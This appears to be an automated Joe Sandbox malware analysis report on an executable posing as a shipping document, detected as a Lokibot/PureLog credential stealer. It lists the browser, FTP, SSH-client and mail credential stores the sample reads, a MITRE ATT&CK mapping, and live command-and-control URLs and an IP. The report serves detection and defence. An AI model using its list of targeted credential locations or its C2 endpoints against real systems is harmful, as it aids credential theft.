Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Code function: SmtpPassword		3_2_0040D069

Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?ajax=ee	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://45.77.223.48/~blog/?ajax=ee	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.fontbureau.com/designers	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sakkal.com	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000000.00000002.1737632139.0000000007582000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.77.223.48	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431478
Start date and time:	2024-04-25 09:41:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/8@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 178 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:41:53	API Interceptor	88x Sleep call for process: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe modified
09:42:04	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.77.223.48	SCB99440721399.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48/~blog/?ajax=posts.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	SCB99440721399.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48
	pikabot_core.bin.exe	Get hash	malicious	PikaBot	Browse	45.32.188.56
	https://i.imgur.com/EoTj4iI.png	Get hash	malicious	Unknown	Browse	155.138.160.21
	https://i.imgur.com/VlAllek.png	Get hash	malicious	Unknown	Browse	155.138.160.21
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	80.240.20.220
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	45.76.249.237
	NMdpQecbkg.elf	Get hash	malicious	Mirai	Browse	44.40.187.94
	shipping document.vbs	Get hash	malicious	FormBook, GuLoader	Browse	80.240.20.220
	lS9yzwGRef.elf	Get hash	malicious	Mirai	Browse	44.174.121.50
	Q2bIN963Kt.elf	Get hash	malicious	Mirai, Okiru	Browse	44.174.121.31

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SIV50C2VQTB0P0PT_c32e84ebc64fed548d6828e72decc9907242fb41_3d54c267_e087f265-1305-4ae3-80f3-8ef54b7d0dee\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2005771929252098
Encrypted:	false
SSDEEP:	192:/i0nQPf+0BU/SaGOJo1ZrFcadzuiFjbZ24IO8TO:9nQPNBU/SahPadzuiFHY4IO8TO
MD5:	166202870175556582D82BA87CE719D0
SHA1:	9EC43A1D693BB508C30B910D500BB9B4B12AEE0B
SHA-256:	ED695C9E5293FDD8464ACCD774F10F8EE529E0F60873C4CC0599B54482A1A6DD
SHA-512:	5C8244C99F55E706A49F2D05F998871AAA63FB2AA63C953A1705D9F61B96CAFD06B10205D590A4022442E0032CF0201766039CE43231A85FDFCAA4BD0897976C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.4.5.1.5.8.2.3.1.6.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.4.5.1.6.4.9.5.0.4.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.8.7.f.2.6.5.-.1.3.0.5.-.4.a.e.3.-.8.0.f.3.-.8.e.f.5.4.b.7.d.0.d.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.c.b.2.7.e.-.1.5.8.d.-.4.e.4.9.-.8.9.e.1.-.a.5.2.1.b.0.a.1.b.f.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.w.b.#. .1.2.9.4.4.4.0.2.9.1.;. .2. .k.i._.n.;. .G...W. .3...3.0. .K.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.H.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.c.-.0.0.0.1.-.0.0.1.4.-.4.d.3.7.-.1.7.0.a.e.4.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.e.8.9.0.c.2.f.1.a.0.8.a.9.d.b.d.0.5.7.4.6.1.1.6.6.2.4.e.5.7.0.0.0.0.0.0.0.0.!.0.0.0.0.6.6.6.6.9.1.e.4.d.0.3.b.b.9.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63DD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Apr 25 07:41:56 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	333270
Entropy (8bit):	4.271778087216056
Encrypted:	false
SSDEEP:	3072:NVdJgt/jMYLtrvXMyDU4uEqnaj5wTLTg6ZMAbnEU9H:NVU1YYFfMyDU4P9YTgi
MD5:	495F22B499717215B4976130BA34F58C
SHA1:	85AA3F7FD70D9919FFA9C8FC10B910AA480A4DA1
SHA-256:	F1DC63CC1F601EB1FD3E760F2D1A332BE99D81BE3B6D9293096A51644C98698F
SHA-512:	8732CDB96D3A356A55D009EB1233E6166305DFC91AC691391C7863BD011AFB1D152A791D36D8F4A29D5349CD17FF94DABFA2453A67BAAB8393F68887642E61F3
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......D.f............D...............X.......$....&...........U..........`.......8...........T........... 6..............0&...........(..............................................................................eJ.......(......GenuineIntel............T...........@.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6555.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8496
Entropy (8bit):	3.707189967409724
Encrypted:	false
SSDEEP:	192:R6l7wVeJ4I6CC6Y92SU9NBTUgmfZUxprnk89bsLsfekm:R6lXJ36CC6Y8SU9TogmfGbBsQf0
MD5:	249DD591581C4E182C7256CC000C6C11
SHA1:	093373D741C1BE0A4385F9C38909CB4CB93AA89E
SHA-256:	34CD239ECA80C1FB18039122624DD5C6A1BE1D53BCF470A4ACC9D4D843F073DE
SHA-512:	16B491911BC2C4A0184627CCB17DC73FA20161BBD93999B90D7142F6856B0D9FCF0122154AE0B4638362C8E26551BF90F059D89797D7FDF9E780EE2D435C8299
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6575.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4850
Entropy (8bit):	4.54495953392849
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfJg77aI9orWpW8VYTPYm8M4JzOD7kFKrrX+q8vHOD7W1sEKd:uIjfBI7Sa7VWSJzErrXKHF1sEKd
MD5:	575026548C2C9762F8075AF3D75AD2F0
SHA1:	A84504358CCB28A478E7B54E95A67C80A4DDA92A
SHA-256:	3897E8B1FFD0B4FD1CC30A60CF202676D12AB1FD9A193CFFEAF14C4CA5214891
SHA-512:	0454BA50703682330195271DCAEA633DE6EDC12D88A5EF40AA6986B86BD603BE6526FD93465691F9431D1EFE32D2BB80A754C8BC987750A4115259D7C3C20C49
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.log

Download File

Process:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
